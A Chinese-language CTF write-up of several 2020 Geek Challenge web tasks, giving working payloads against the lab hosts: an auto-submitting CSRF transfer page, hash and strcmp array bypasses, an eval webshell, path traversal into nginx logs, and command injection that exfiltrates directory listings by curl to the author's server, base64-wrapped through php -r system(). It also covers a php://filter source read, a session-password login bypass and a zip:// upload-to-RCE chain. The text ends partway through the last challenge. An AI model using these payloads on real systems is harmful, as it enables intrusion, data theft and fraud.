2020极客大挑战部分web题WriteUp
WriteUP
Welcome
题目地址: http://49.234.224.119:8000/
题目描述: 欢迎来到极客大挑战!
访问题目链接,发现405报错。
百度了一下,发现是GET或者POST请求出问题了。拿Postman试一下:
看了一下需要POST上传一个roam1,roam2,这两个的值不能相等,哈希值要相等,好了,传入数组。
因为各种哈希都无法对数组进行操作,会返回False。然后又因为False === False => True,所以顺利绕过~
在phpinfo里面找找可以利用的信息:
众所周知,一般的Apache和nginx的根目录是/var/www/html,所以只需要访问http://49.234.224.119:8000/f1444aagggg.php即可。
访问结果是这:
其实这是个假页面,是手动写出来的 /捂脸
至于为什么,可以随便访问一个不存在的页面:
下面会出现Apache信息,然鹅flag页面没有,所以真flag肯定藏在页面信息内。
找了一圈发现在某个偏僻的角落(网络模块的消息头):
出题人真的挺憨批的/我也是真的憨批···
flagshop
题目地址: http://173.82.206.142:8005/
题目描述: 你给我钱,我给你flag,就是这么简单
提示:1.No sessionid!Don't Try to be admin(robot?) 2.Do you know csrf?
这道题的考点是CSRF,啥是CSRF?现场百度。
看不懂?没事,做完这道题你就懂了。
首先是个登录界面,测了一下SQL注入没啥鸟用(都提示CSRF了就老老实实注册吧)。
注册完登录以后给我送了11块钱,感动。往下一拉,发现买flag要好多好多钱,瞬间这11块钱就不香了。
flag商店上面一点点可以看到财(白)富(嫖)榜,好了我们的目标就是这些人了,具体干啥还不知道,先瞄准Longlone从他下手就完事了。
第二个功能是转账。突然奇思妙想,能不能开个脚本不断注册新用户然后对自己的账户进行转账呢。每次转11块钱?
翻回去看了一下flag的价格我就停止了这个想法
1万兆RMB,每次转11元需要转1千兆次,每次2秒钟(就算快一点也要一秒以上)大概等比赛结束还没转完。dbq是我太菜。
好了不扯了,那这个转账功能干嘛用的呢,猜测是利用某个漏洞,让Longlone这个大(冤)富(大)豪(头)在不知情的状态下给我转账嗷~
第三个功能是报告,这里还一段戏,重点是我会好好查看你们的报告
好了破案了,提示了CSRF,那就构造一个链接在这里提交,老板在查看报告的时候点一下链接,钱就没啦~
好了问题来了,怎么构建转账链接呢,代码已写好:
<html>
<head>
<script>
window.onload = function() {
document.getElementById("postsubmit").click();
}
</script>
</head>
<body>
<form method="post" action="http://173.82.206.142:8005/transfer.php" enctype="multipart/form-data">
<input id="target" type="text" name="target" value="Wake" />
<input id="money" type="text" name="money" value="111111111111" />
<input id="message" type="text" name="messages" value="hhh" />
<input id="postsubmit" type="submit" name="submit" value="submit" />
</form>
</body>
</html>
把这个页面挂在某个服务器上,然后把访问这个网页的链接提交到报告里面就好啦!
服务器干嘛用呢,这里主要涉及到公网和内网的知识点。一般的机子都是处于一个局域网下,没有一个固定的公网ip,非局域网下的用户没办法访问你的ip,所以就需要一个公网ip。
一般来说个人是没有公网ip的,如果想要的话可以去租个云服务器,或者利用内网穿透将自己的一些端口映射出去即可。
这里采用将恶意网页挂在云服务器上,构造的结果是111.229.xxx.17/aaa.html(菜鸡选择不暴露自己的ip免得被日穿)
然后发现这里需要输入一个验证码,md5哈希值的前五位有要求。然后写了个代码爆破一下:
#coding:utf-8
#python3
import hashlib
import time
t = time.time()
l = 'qwertyuiopasdfghjklzxcvbnm'
for i in l:
for j in l:
for k in l:
for m in l:
for n in l:
for o in l:
f = i + j + k + m + n + o
md5 = hashlib.md5(f.encode(encoding='UTF-8')).hexdigest()
if md5[:5] == 'f34c3':
print(f)
print(md5)
print(time.time()-t)
很快就爆出了两个
然后提交一下:
去主页看看:
然后买一下flag就搞定啦~
朋友的学妹
题目地址:http://49.234.224.119:7413/
题目描述:与妹子单独相处一会儿吧
没啥好说的,右键查看源码出flag
EZwww
题目地址:http://47.100.46.169:3901/
题目描述:备份是个好习惯
试了试www.zip,就下载下来了附件。
这里有个假flag。
打开index.php,看到源码:
<html>
<head>
<title>Lola's website1.0</title>
</head>
<body>
<?php echo '<h1>welcome to my website</h1>'; ?>
<?php echo '<p>i will never forget to backup my website......</p>'; ?>
<?php echo '<img src="img/lola.gif" alt="welcome~"/>'; ?>
</body>
</html>
<?php
$key1 = $_POST['a'];
$key2 = base64_decode('c3ljbDB2ZXI=');
if($key1 === $key2)
{
//this is a true flag
echo '<p>SYC{xxxxxxxxxxxxxxxxxx}</p>';
}
?>
key2的结果是sycl0ver。
传一个上去:
EZgit
题目地址:http://47.100.46.169:3902/
题目描述:当前大量开发人员使用git进行版本控制,对站点自动部署。如果配置不当,嘿嘿嘿。。。
提示git了,先访问http://47.100.46.169:3902/.git
好了,git源码泄露。
githack上线:传送门
下载下来以后解压,在当前目录打开cmd:
等两分钟左右 要好久
在dist下有一个目录,就是刚才githack攻击的结果。
打开之后flag居然过期了:
然后理一遍思路:
git是用来这里版本信息的,这里表示版本过期了,那就需要更新一下版本。
可以使用git log -p 查看git所有的日志,一目了然。也可以用git更新一下fl4g.php,flag也会在里面。(前提是要装git,安装过程自行百度~)
刘壮的黑页
题目地址:http://106.54.75.217:8080/
打开之后再页面底下有源码
<?php
include("flag.php");
highlight_file(__FILE__);
$username = $_GET['username'];
$passwd = $_POST['passwd'];
if ($username === 'admin' && $passwd === 'syclover') {
echo $flag;
}
然后GET传一个username=admin,POST传一个passwd=syclover就出flag了。
我是大黑客
点开链接,直接说明有一个liuzhuang.php.bak,访问一下:
<?php
eval($_POST['liuzhuang']);
//谁是大恶人 那必定是我liuzhuang
//当你的服务器看到 0xliuzhuang 就知道要买台新机器了
?>
明显的一句话木马,连一下:
连上了,根目录下有flag:
ezbypass
打开链接,要求的上传一个a和一个b,必须满足两个条件:
- a和b的strcmp结果要为NULL
- a和b不能相等
利用数组绕过。
这里又要求post传一个c要等于123但是又不能是数字,那就传一个123qwe
123后面加一些字母/字符就行。
知X堂的php教程
题目地址:http://47.94.239.194:8082/
题目描述:知X堂(PS:请勿对号入座)的php教程开课啦!ん?好像不太对劲?
进去之后有一个可以点的链接,先点一下:
然后这个url有点奇怪:
listdir是列出目录下所有文件的意思,那这个php的功能是不是传入一个目录地址可以列出来呢?
是的,但是不全(为什么不全后面会讲)。
这里列出了一个flag.php,点一下:
虽然是flag.php但是一点诚意都没有,因为这里并没有include其他php,所以就算达成条件也输不出flag。
然后,嗯?这个链接构造有点意思,居然先访问的displaySourceCode.php
咦,难不成这个东西可以直接显示所有文件的内容?试着包含自己
哦豁,确实可以读取所有东西。
然后,这里出现了一个非预期
我读取了一下日志文件
直接看到了大佬的payload,然后回头试了一下就干进去了。
payload是这个:
http://47.94.239.194:8082/displaySourceCode.php?phpfile=../../../../var/log/nginx/access.log
就在我这么"做出来"的一小时以后,发现这个payload已经不能用了(估计管理员已经将这个文件设置成700权限了吧),Guest用户不可见,还好我机智没把这个页面关掉,这才有了这张截图。把这个payload打一下,直接出flag:
憨批操作到此为止,接下来上干货,正规解法来了(虽然不知道这个解法会不会也是非预期)!
首先读取一下listdir.php
<?php
include("waf.php");
// 设置目录名称并进行扫描。
$search_dir = $_GET['dirname'];
$title = "教案";
// 防止命令注入
$search_dir = shellWaf($search_dir);
//$contents = scandir($search_dir); 或者使用
exec("ls $search_dir", $contents);
重点部分代码是这块,这里使用exec执行这个命令,而这个语句里面的search_dir是可控的,但是会被waf.php过滤掉一部分,那就去看看waf过滤了啥。
<?php
// 防御XSS
function html($string) {
return htmlspecialchars($string);
}
// 防御命令注入
function shellWaf($string) {
return preg_replace("/(&)|(\|)|(>)|(<)/i", "", $string);
}
其实就过滤了& | > <,那就试着利用分号来进行RCE:
举个栗子,我们上传/;echo Wake,那么在PHP里面出来的是
ls /;echo Wake
看看linux下的执行结果:
其实就是两条命令一起执行了!好了,漏洞已经找到,搞就完事了。
前面已经说了 listdir.php 是列出文件的东西,传一个/构造一下:
ls /
只显示了一个start.sh
讲道理的话,根目录下肯定有一堆bin boot等一堆文件夹,然鹅这里没有显示出来,不讲道理,看看源码:
这里的is_file只显示常规文件,不显示文件夹和非常规文件。那只能想其他办法获取这个内容了,盲猜flag就在根目录下。
这里介绍一下nc,一个被称为瑞士军刀的linux小工具。参考链接
比如在服务器上开一个nc服务:
然后访问一下
发现可以在服务器端看到传了些啥
实用工具介绍完毕,开始干活。众所周知Linux向网页发起请求使用的是curl,比如
curl 111.229.xxx.17:1234?hello=qwe
下面这台机子向上面那台服务器发起请求,可以接到。利用这个来搞事情~
构造出来一个payload:(虽然这么构造但是我们不上传前面那个ls,那个ls是php内置的)
ls /;curl 111.229.xxx.17:1234?hello=`ls /`
服务器端收到了一个bin
看来是分号将请求截断了,可以用base64绕过
ls /;curl 111.229.xxx.17:1234?hello=`ls /|base64`
这里的|base64是将前面的结果进行base64编码
但是考虑到waf过滤了|,于是用php套娃。
构造:
ls /;php -r 'system(base64_decode("Y3VybCAxMTEuMjI5Lnh4eC4xNzoxMjM0P2hlbGxvPWBscyAvfGJhc2U2NGA="));'
真鸡儿困难
哦,原来文件名叫这个,然后试试列出flagggggggggggggg_1s_here目录下有啥
ls /;curl 111.229.xxx.17:1234?hello=`ls /flagggggggggggggg_1s_here/*|base64`
====>
ls /;php -r 'system(base64_decode("Y3VybCAxMTEuMjI5Lnh4eC4xNzoxMjM0P2hlbGxvPWBscyAvZmxhZ2dnZ2dnZ2dnZ2dnZ2dfMXNfaGVyZS8qfGJhc2U2NGA="));'
反手就是一个读取:
http://47.94.239.194:8082/displaySourceCode.php?phpfile=../../../../../flagggggggggggggg_1s_here/flag
有一说一我真菜做了好久好久
Myblog
题目地址:http://173.82.206.142:8006/ 或访问 http://120.27.146.26:8002/
题目描述:我写了个简单的博客,欢迎大家来访问!
提示:
- 1.Do you know the PHP pseudo-protocol?
- 2.Every 5 minutes remove all upload files.
进去以后是Home
找了一圈,发现两个比价有用的线索
- 不管访问什么界面,url都是
index.php?page=xxx - login登录界面
根据网url推测这个page是文件包含,试试php伪协议读取源码:
http://173.82.206.142:8006/index.php?page=php://filter/read=convert.base64-encode/resource=login.php
读取不出来,但是想到原来url的末尾是?page=home,试试去掉.php
http://173.82.206.142:8006/index.php?page=php://filter/read=convert.base64-encode/resource=login
得到
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<title>Login</title>
<meta name="description" content="">
<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
<meta name="robots" content="all,follow">
<link rel="stylesheet" href="https://ajax.aspnetcdn.com/ajax/bootstrap/4.2.1/css/bootstrap.min.css">
<link rel="stylesheet" href="css/style.default.css" id="theme-stylesheet">
</head>
<body>
<div class="page login-page">
<div class="container d-flex align-items-center">
<div class="form-holder has-shadow">
<div class="row">
<!-- Logo & Information Panel-->
<div class="col-lg-6">
<div class="info d-flex align-items-center">
<div class="content">
<div class="logo">
<h1>欢迎登录</h1>
</div>
<p>—— 博客后台 ——</p>
</div>
</div>
</div>
<!-- Form Panel -->
<div class="col-lg-6 bg-white">
<div class="form d-flex align-items-center">
<div class="content">
<form method="post" action="/?page=admin/user" class="form-validate" id="loginFrom">
<div class="form-group">
<input id="login-username" type="text" name="username" required data-msg="请输入用户名" placeholder="用户名" class="input-material">
</div>
<div class="form-group">
<input id="login-password" type="password" name="password" required data-msg="请输入密码" placeholder="密码" class="input-material">
</div>
<button id="login" type="submit" class="btn btn-primary">登录</button>
<div style="margin-top: -40px;">
<!-- <input type="checkbox" id="check1"/> <span>记住密码</span>
<input type="checkbox" id="check2"/> <span>自动登录</span> -->
<div class="custom-control custom-checkbox " style="float: right;">
<input type="checkbox" class="custom-control-input" id="check2" >
<label class="custom-control-label" for="check2">自动登录</label>
</div>
<div class="custom-control custom-checkbox " style="float: right;">
<input type="checkbox" class="custom-control-input" id="check1" >
<label class="custom-control-label" for="check1">记住密码 </label>
</div>
</div>
</form>
<br />
<small>没有账号?</small><a href="#" class="signup"> 不给注册</a>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
<!-- JavaScript files-->
<script src="https://libs.baidu.com/jquery/1.10.2/jquery.min.js"></script>
<script src="https://ajax.aspnetcdn.com/ajax/bootstrap/4.2.1/bootstrap.min.js"></script>
<script src="vendor/jquery-validation/jquery.validate.min.js"></script><!--表单验证-->
<!-- Main File-->
<script src="js/front.js"></script>
</body>
</html>
<?php
require_once("secret.php");
mt_srand($secret_seed);
$_SESSION['password'] = mt_rand();
?>
这个代码好像没啥用,放着吧。
然后观察一下登录界面的源码,可以发现有一个admin/user目录
包含一下这个:
<?php
error_reporting(0);
session_start();
$logined = false;
if (isset($_POST['username']) and isset($_POST['password'])){
if ($_POST['username'] === "Longlone" and $_POST['password'] == $_SESSION['password']){ // No one knows my password, including myself
$logined = true;
$_SESSION['status'] = $logined;
}
}
if ($logined === false && !isset($_SESSION['status']) || $_SESSION['status'] !== true){
echo "<script>alert('username or password not correct!');window.location.href='index.php?page=login';</script>";
die();
}
?>
<?php
if(isset($_FILES['Files']) and $_SESSION['status'] === true){
$tmp_file = $_FILES['Files']['name'];
$tmp_path = $_FILES['Files']['tmp_name'];
if(($extension = pathinfo($tmp_file)['extension']) != ""){
$allows = array('gif','jpeg','jpg','png');
if(in_array($extension,$allows,true) and in_array($_FILES['Files']['type'],array_map(function($ext){return 'image/'.$ext;},$allows),true)){
$upload_name = sha1(md5(uniqid(microtime(true), true))).'.'.$extension;
move_uploaded_file($tmp_path,"assets/img/upload/".$upload_name);
echo "<script>alert('Update image -> assets/img/upload/${upload_name}') </script>";
} else {
echo "<script>alert('Update illegal! Only allows like \'gif\', \'jpeg\', \'jpg\', \'png\' ') </script>";
}
}
}
?>
中间的HTML代码都没用,已经删去。这里有两个php代码,第一个php是登录用的代码,第二个是上传用的代码,先看登录代码:
<?php
error_reporting(0);
session_start();
$logined = false;
if (isset($_POST['username']) and isset($_POST['password'])){
if ($_POST['username'] === "Longlone" and $_POST['password'] == $_SESSION['password']){ // No one knows my password, including myself
$logined = true;
$_SESSION['status'] = $logined;
}
}
if ($logined === false && !isset($_SESSION['status']) || $_SESSION['status'] !== true){
echo "<script>alert('username or password not correct!');window.location.href='index.php?page=login';</script>";
die();
}
?>
重点是if ($_POST['username'] === "Longlone" and $_POST['password'] == $_SESSION['password'])
要求$_POST['password'] == $_SESSION['password'])
我们可以把session这边的cookie删掉,然后上传一个空密码就行啦,顺利绕过登陆~
操作步骤如下:
删掉以后:
再输入用户名,点击登录发现这个是个必须填写的选项。
这个东西可以在前端进行修改,在查看器那边将require删掉即可。
然后就登录进去了。
这里有个上传入口,而且后台代码都给你了,想都不想肯定是上传漏洞。
<?php
if(isset($_FILES['Files']) and $_SESSION['status'] === true){
$tmp_file = $_FILES['Files']['name'];
$tmp_path = $_FILES['Files']['tmp_name'];
if(($extension = pathinfo($tmp_file)['extension']) != ""){
$allows = array('gif','jpeg','jpg','png');
if(in_array($extension,$allows,true) and in_array($_FILES['Files']['type'],array_map(function($ext){return 'image/'.$ext;},$allows),true)){
$upload_name = sha1(md5(uniqid(microtime(true), true))).'.'.$extension;
move_uploaded_file($tmp_path,"assets/img/upload/".$upload_name);
echo "<script>alert('Update image -> assets/img/upload/${upload_name}') </script>";
} else {
echo "<script>alert('Update illegal! Only allows like \'gif\', \'jpeg\', \'jpg\', \'png\' ') </script>";
}
}
}
?>
这里采用白名单过滤,于是可以将php文件打包成zip,改后缀名为jpg,再利用zip伪协议进行读取。
直接上手:
然后上传:
访问一下:
发现有文件,但是没办法显示(出不来是因为我们这个文件是个压缩包,不是个正经的图片)
然后利用zip伪协议读取一下,格式如下:
zip:// + zip路径 + %23 + php文件名
http://173.82.206.142:8006/?page=zip://./upload/6f49107b371dc2c26e97d8579ecf2c0979936271.jpg%231
#这里不加.php后缀是因为在index.php包含的时候默认加上了
同时上传一个cmd变量执行命令
